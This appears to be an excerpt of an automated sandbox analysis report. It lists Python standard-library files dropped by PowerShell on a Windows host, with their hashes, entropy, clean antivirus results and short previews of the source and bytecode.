                              MD5:9511989045D3247243E25A31B64B259A
                              SHA1:800A8C327F47BCC41F0724162C00B7FE8E29D0E2
                              SHA-256:3A2AAF9CFFB2FD7CF4F27DB0B8C16160C08FBA69D55C7237865C9C9D7BB92444
                              SHA-512:DB0D4AEC0F57EF2E43A235E8A23BD503966346CB717AAEF963D2E0796025133508F623AD1E6E80CF84D388008E73196AF02BD4C209F089CE09C827D24CD440DF
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9332
                              Entropy (8bit):4.649641793285662
                              Encrypted:false
                              SSDEEP:192:ibiuRsd32//Cs0uRC7F6Uq/WRTus50sMEE4EDkaq71uqhCkiu66V:ibiuRc3uR+oct5TSknRxCnc
                              MD5:210849258B55A6D3D5174A928D20D355
                              SHA1:C3C7B26339C20AC1FE5570AA3E936C5C6BDC27C6
                              SHA-256:998AAA9A183839BEB0582E98B1C5C8BD061B4706A4C54A1F5F42388D60DE9968
                              SHA-512:9B432E4DBCE50759C067DA26A5FC5984B08E25A8D1545246EED4C851C9C319A1C2FC3700D7C7866C523FA4C1927F058067A404775B916D0B2C783E13202B1F29
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Python implementations of some algorithms for use by longobject.c...The goal is to provide asymptotically faster algorithms that can be..used for operations on integers with many digits. In those cases, the..performance overhead of the Python implementation is not significant..since the asymptotic behavior is what dominates runtime. Functions..provided by this module should be considered private and not part of any..public API.....Note: for ease of maintainability, please prefer clear code and avoid.."micro-optimizations". This module will only be imported and used for..integers with a huge number of digits. Saving a few microseconds with..tricky or non-obvious code is not worth it. For people looking for..maximum performance, they should use something like gmpy2."""....import re..import decimal......def int_to_decimal(n):.. """Asymptotically fast conversion of an 'int' to Decimal.""".... # Function due to Tim Peters. See GH issue #90716 for details... # https://github
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3231
                              Entropy (8bit):4.290837712719538
                              Encrypted:false
                              SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                              MD5:2E95AAF9BD176B03867862B6DC08626A
                              SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                              SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                              SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):25180
                              Entropy (8bit):4.561270108182618
                              Encrypted:false
                              SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTJdNtxn/kNVGn/UrbrupREQ43LVkZM:C1FxIO7/p6Woph/5uZTJrn/gVHupQCi
                              MD5:E26D242110C2938D1C7007078DE61DF1
                              SHA1:04255EA46E155F82C31F3252B95F97500BAE2CE6
                              SHA-256:8961AA3BF0FE6D677D26F83EA25C72685A6C7DDE51D3BBD2EC4A2A405676A320
                              SHA-512:B3263902E8B2BFA72D6925C7C090E31A7D64060ECCD26810C360DD2C6956ED1E41B37301932BFCF4B2874099F10B6363F1EA8EEEA91BF390697F1BF1E29C652F
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7462
                              Entropy (8bit):4.6221334949688195
                              Encrypted:false
                              SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                              MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                              SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                              SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                              SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6098
                              Entropy (8bit):4.192824803537849
                              Encrypted:false
                              SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsBWP4m4FE8445m4IinbyQqVRA6U4e4nC8s:ELj/7euM4QgoofXsU4m4FH4484I+byFW
                              MD5:06C63C4624FB2BE6BEFD2E832B3B4BC2
                              SHA1:D373F09FCAC33928E9F5330B0C6D1CFDB2F73B0A
                              SHA-256:CF8031A6E21150438F3D2964C4152615B91A03894616D5B6930E0F14F44DABDA
                              SHA-512:24D7CD2E0959E90DE5E4D252BCB655376833A948B03E99E2CE727CE115BFFE0247475D9EF096A4AACAFDBD1D3681031F44E63DE9A77B221B444C4FC40574A86E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import GenericAlias....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6726
                              Entropy (8bit):4.486484271805505
                              Encrypted:false
                              SSDEEP:192:gPAaxlPQ/yqe//e/2Dkpps4mWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlPGu9kv+0TmnTLikZW9CxbOJbYQ
                              MD5:DFF4191A9750BEA25195EB71E1900BC9
                              SHA1:8E8A36CFF4D530173246ED9E11B4B725AA928745
                              SHA-256:D51C54428495CD62A5DA4360315FA84F692B5AA9DB21BE986B3E14A83F7CF288
                              SHA-512:E65AE5548AB347AE2597D30DBD0198BCAE062ED8547D83B61FF64F929538AEBE772928444F8AE42724E63C760267B573A505D27B9A987A96F23F232B1445CFFA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, arg1, arg2, argN):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmet
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):35195
                              Entropy (8bit):4.473668543181026
                              Encrypted:false
                              SSDEEP:384:Ob3TMIq3JRejezqFTTQjJFUT2uXUmwlKjevW7ZigkLmS3V2XpRY:4MHDejezqFvgAT2u/NKvW7dkZlMY
                              MD5:29B0B8756C6385B118FE2DFB14C14E60
                              SHA1:D4B227129C2AC363985958C029A49E262009C968
                              SHA-256:36A33CB62BCE2EEFC61AD2C7C7555407404481A9543F1C366C32CDE3513D8A14
                              SHA-512:72E9E6E6657648214AA3103191350ABD395C9F18632E1AB0B8B288F2F20FCF082866565EEB3423B05E3FCE3009210EA0323417021BE7F8B7AD5CE9F2E26A0EA7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):517
                              Entropy (8bit):5.2580863991460935
                              Encrypted:false
                              SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                              MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                              SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                              SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                              SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                              Malicious:false
                              Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):104119
                              Entropy (8bit):4.3030977393835945
                              Encrypted:false
                              SSDEEP:1536:g3gKb2hia9uoUtRLsuQ6vuehQEy17ulHC91vhAxs/GNu:gQKb2hiaEaouehQEy17ulc1vix8GU
                              MD5:9ABA51F90E74A8E274049641C983CE6E
                              SHA1:1A442F0D9615D4579C8E13423B9E214C4CFF01F4
                              SHA-256:7778CD670473220869FBF4E58022EACED79B6E10F0F19A5A9C75E48144A47CED
                              SHA-512:36864CF907C2947A9143D2FBC2AB94D4D956D5C70BAF41B1A2788FEE6A6D7DCD12CC2FDE2EA8EEF42D7520E4102DAD1CA75064DE4A6E72FB22FE187CEA623CB3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):66095
                              Entropy (8bit):4.436459922159699
                              Encrypted:false
                              SSDEEP:1536:pZ0JQ/yNX9e8T1Y+XxAB9NHWingliua1wDGy1:pZoIyNX9/xSNHTngl+1E1
                              MD5:5151A0383BADE72982C59D5E7BD5B2AC
                              SHA1:D91D8446C427B23FA39B603DFDE047028471A288
                              SHA-256:A3CC2501761596DB13CDC84F085DD2736E5C352B51F39F26BDD2407D99DFBB72
                              SHA-512:5A46B0923EF9F1E42123D98B0CA62C2AFDC337B90788B9849A16BB77E8795E57F7E1121339B0D39B4FF9AB467AD11D36E532D5BEF5E299E196202090BCD0BA20
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1267
                              Entropy (8bit):4.375636067554557
                              Encrypted:false
                              SSDEEP:24:cangJHXiJ6sam35P1cBwj6ju/EPvT+C2cNbgsr0rBP/iZ7Z3fNPS78Wmie/R54:cangJHXiJ6sRp1cBwj6q/EHT+Ntw7gek
                              MD5:727CA595DFCADE1F361549C0F5B5A8EB
                              SHA1:F6D971FED478BBFC41B5CB6E37AADE9E6B9FBEB8
                              SHA-256:5E7FBE996045D0CFBC0F2C76A8291EE59A595645CD823FE72BBF211DBA762B86
                              SHA-512:32797A15155C0EA206792F6BA800E01AC56B764898087DEFB35D5D1FB07F1FE667A411AE0412F5555F5C3DF145FEF4B41E978EC09C463C3FC7A56448FE2A7D40
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""The asyncio package, tracking PEP 3156."""....# flake8: noqa....import sys....# This relies on each of the submodules having an __all__ variable...from .base_events import *..from .coroutines import *..from .events import *..from .exceptions import *..from .futures import *..from .locks import *..from .protocols import *..from .runners import *..from .queues import *..from .streams import *..from .subprocess import *..from .tasks import *..from .taskgroups import *..from .timeouts import *..from .threads import *..from .transports import *....__all__ = (base_events.__all__ +.. coroutines.__all__ +.. events.__all__ +.. exceptions.__all__ +.. futures.__all__ +.. locks.__all__ +.. protocols.__all__ +.. runners.__all__ +.. queues.__all__ +.. streams.__all__ +.. subprocess.__all__ +.. tasks.__all__ +.. taskgroups.__all__ +.. threads.__all__ +.. timeo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3468
                              Entropy (8bit):4.2876076098197755
                              Encrypted:false
                              SSDEEP:96:OzuFQi/qD6/ftAj2UKQOyRm3sSxvxY/yxgm6/Zz:Oe/1Aj2UXOyRmtxvxY/yxK/Zz
                              MD5:4C758632BA30CBD5CA8F50830E11975C
                              SHA1:832901CED4439EA98184031244AB36F500065094
                              SHA-256:82FDC4CD81292B82241AE8EAC259F977F33D7DF882EFC53B75C37C4CC85C525C
                              SHA-512:8660C250524FAC2BCC943A6539E66837DC2F2E4DAD582679C3BB472112C1E7207FE1F938AF0AE0A4423952D4997FB781C25D36E511548A6D4C0464A6FF3529BE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:import ast..import asyncio..import code..import concurrent.futures..import inspect..import sys..import threading..import types..import warnings....from . import futures......class AsyncIOInteractiveConsole(code.InteractiveConsole):.... def __init__(self, locals, loop):.. super().__init__(locals).. self.compile.compiler.flags |= ast.PyCF_ALLOW_TOP_LEVEL_AWAIT.... self.loop = loop.... def runcode(self, code):.. future = concurrent.futures.Future().... def callback():.. global repl_future.. global repl_future_interrupted.... repl_future = None.. repl_future_interrupted = False.... func = types.FunctionType(code, self.locals).. try:.. coro = func().. except SystemExit:.. raise.. except KeyboardInterrupt as ex:.. repl_future_interrupted = True.. future.set_exception(ex).. return..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1496
                              Entropy (8bit):5.057675330980539
                              Encrypted:false
                              SSDEEP:24:hEmPkOfuhSqpwRT6NVlWn6PYSZoYs5Lx06F+bVh2qaT42:qmPKquen6PBBkLx0x51Q42
                              MD5:0305331BCBB392240C87BEDEFABA382C
                              SHA1:35F388E60BACF3449DDE6825C678F830234FD53B
                              SHA-256:F4C38091ED565475022BABD4541811A292428685743C702B1445BB413F4EC8F7
                              SHA-512:173646917DF60667899F289DE6E93E19F5F6209152AFBC76678EBFA7DD852832CBCEED85968145CD600307B5A97B8FCD9FF5D2AE894B144DF2B67A09D391FAC6
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.d.l.Z.d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....e.j$..................e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...Z.e.j&..................d.k(..r.d.d.l.....e.e.j$..................z...Z.y.d.d.l.....e.e.j$..................z...Z.y.).z'The asyncio package, tracking PEP 3156......N.....)...*..win32)...__doc__..sys..base_events..coroutines..events..exceptions..futures..locks..protocols..runners..queues..streams..subprocess..tasks..taskgroups..timeouts..threads..transports..__all__..pla
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):86649
                              Entropy (8bit):5.398268600589993
                              Encrypted:false
                              SSDEEP:1536:6W8yarOdICDg2MXuX/F+OiUGqTLz5zI4lK:gJ8gJXuPg/qj5zIz
                              MD5:D889D4DC2220A4CD07677AB1B74A0ACC
                              SHA1:F0CB64728EA0DFCCBB434F30B671EE78379847EC
                              SHA-256:3E260705F64BFF5441BF806D39F788B5128BF5FE94B00387E586EB20F2818A74
                              SHA-512:562C7261C2C68010757E224FF31D443046984160E3FF9901C0DE416BEFC94385B59563C4380446CEA7453CEC1B23FF62FDF5D850C1A70344406A798089B5FBFC
                              Malicious:false
                              Preview:.........U.fo8........................>.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l"m#Z#..d.Z$d.Z%d.Z&..e'e.d.........Z(d.Z)d...Z*d...Z+d...Z,d&d...Z-d'd...Z.d...Z/..e'e.d.........r.d...Z0n.d...Z0d...Z1..G.d ..d!e.jd..........................Z3..G.d"..d#e.jh..........................Z5..G.d$..d%e.jl..........................Z7y.#.e.$.r...d.Z.Y...w.x.Y.w.)(a....Base implementation of event loop...The event loop can be broken up into a multiplexer (the part.responsible for notifying us of I/O events) and the event loop proper,.which wraps a multiplexer with functionality for scheduling callbacks,.immediately or at a given time in the future...Whenever a public API takes a callback, subsequent positional.arguments will be passed to t
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3125
                              Entropy (8bit):5.273056654169252
                              Encrypted:false
                              SSDEEP:48:YCrztq9FGsMIr+0Tm+XaOrNnagJjx4cjiYp5piNkzy62enld:Xz8g5yxDjHpiNfb8ld
                              MD5:420AE0CFA5317B7B8B37866837BA19CB
                              SHA1:49973A21827438524D0E3B304EE89D388ADA27A7
                              SHA-256:D35541A4D503F325BFC5AD462924CDC8F1D36762B311855D447F88538D96C3FB
                              SHA-512:A76B11AA3AEBE405925174B5F1F4F4A009E621B297E563F2D902D62618E217223B5F6B462F1193D0C5B92A58547A5DFCB45B9B6D72501950658D4D57CC76A8A4
                              Malicious:false
                              Preview:.........U.f..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.Z.d.Z.d...Z.d...Z.d...Z...e.j...........................d...........Z.y.)........N.....)...format_helpers..PENDING..CANCELLED..FINISHEDc.....................N.....t.........|.j...................d.........x.r...|.j...................d.u.S.).z.Check for a Future... This returns True when obj is a Future instance or is advertising. itself as duck-type compatible by setting _asyncio_future_blocking.. See comment in Future for more details.. .._asyncio_future_blockingN)...hasattr..__class__r....)...objs.... .RC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_futures.py..isfuturer........s+...........C.M.M.#=..>....5.....(..(....4....6.....c..................... .....t.........|.........}.|.s.d.}.d...}.|.d.k(..r...|.|.d.....d.............}.nc|.d.k(..r+d.j.....................|.|.d.....d...............|.|.d.....d.....................}.n3|.d.kD..r.d.j.....................|.|.d.....d....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16141
                              Entropy (8bit):4.81325239522766
                              Encrypted:false
                              SSDEEP:192:Q/1E7A/+43w96wI+iPdwD99/mzyq6J1K+54EUg3F8s/1iT5ODOoAZNQEaSABb2pX:QcTqwUwI+i6D99/B1M0P78AU/sWV
                              MD5:127AF1319C85D9C31A5CF8B2EA272930
                              SHA1:19CD27E3CD882A3DF4E27FA04350B8C253710C67
                              SHA-256:690A57AAAA98FAA67FA7DBEFDE7A75491FA45F28CE8B50237B5691615FA088F1
                              SHA-512:E55028CAD5239B740D15D88A7280312DA0FEC50F8A8618F4C26E53D9DEF251A2A8B5DE94AF4735B77F37389E3655958375BABFF004DE1AF3D9125A91F4474B7D
                              Malicious:false
                              Preview:.........U.f.#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z.y.)......N.....)...protocols)...transports)...loggerc............................e.Z.d.Z...d...f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.e.j...................f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)...BaseSubprocessTransportc.....................n.......t...........|.....|...........d.|._.........|.|._.........|.|._.........d.|._.........d.|._.........d.|._.........g.|._.........t.........j...........................|._.........i.|._.........d.|._.........|.t.........j...................k(..r.d.|.j...................d.<...|.t.........j...................k(..r.d.|.j...................d.<...|.t.........j...................k(..r.d.|.j...................d.<.......|.j ..................d.|.|.|
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4126
                              Entropy (8bit):5.010956848606777
                              Encrypted:false
                              SSDEEP:48:uOlx5RYGODNmByK2S+rDZjrjYFyGkhIv4Yos0ee2nJsZ1Xgp9lyRoJwY:uOlxcDQMZjrjYMGCW2sPWZypPgY
                              MD5:38FF290F8967A776558ED039E8DBAFFC
                              SHA1:0A31A4AD9A03D6FC864CD8DF69D6FF1A86B8AAA4
                              SHA-256:31576386F316C69789FC080A48A3DED69C700AA24235FC13D768D56038FC0E24
                              SHA-512:F9510BC654E4B2F4FA707AE09D3A4AC4C16A7A768D66B79936096045FD019ED13697377EBFEC914730DA63A394B61C8FE8F78455BC5C31ED81814AA3EF936AB0
                              Malicious:false
                              Preview:.........U.f..........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z...e.j...........................d...........Z.d...Z.d...Z.y.)......N.....)...base_futures)...coroutinesc..........................t.........j...................|.........}.|.j...........................r.|.j...........................s.d.|.d.<...|.j...................d.d.|.j...........................z.............|.j.....................|.j...................d.d.|.j.................................|.j...................r5t.........j...................|.j...........................}.|.j...................d.d.|...d.............|.S.).N..cancellingr....r....z.name=%r.....z.wait_for=z.coro=<..>).r......_future_repr_infor......done..insert..get_name.._fut_waiter.._coror......_format_coroutine)...task..info..coros.... .PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_tasks.py.._task_repr_infor........s...........)..).$../.D........................Q......K.K...9.t.}.}..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):994
                              Entropy (8bit):5.436833421613762
                              Encrypted:false
                              SSDEEP:12:h4JJKlPYVdVz4tlgko4KqIrahXvUl0WpqVtLTN+MQ3djeWCkMkmhErqDSpvjCHlK:h4JJ+QFx4Lfsl0Wpk+TtjjmhEmsrCHlK
                              MD5:838C9BC4C34093F88DE57D94639C3F2E
                              SHA1:8657649AAE2403D6C26AA0B084169806B10E2D13
                              SHA-256:D77545596D608B8E8619BDF731D53E7343FAEF54B560D4D3373545B60E9262FA
                              SHA-512:B440FBC15094371DF7095EAE2EF4DA2727514EA7F86F83AD22C2C2A46B975A4A32FAE8D465F37B484AD7153D1B63B86B60D2C28954C619A165294E3A0AD65D87
                              Malicious:false
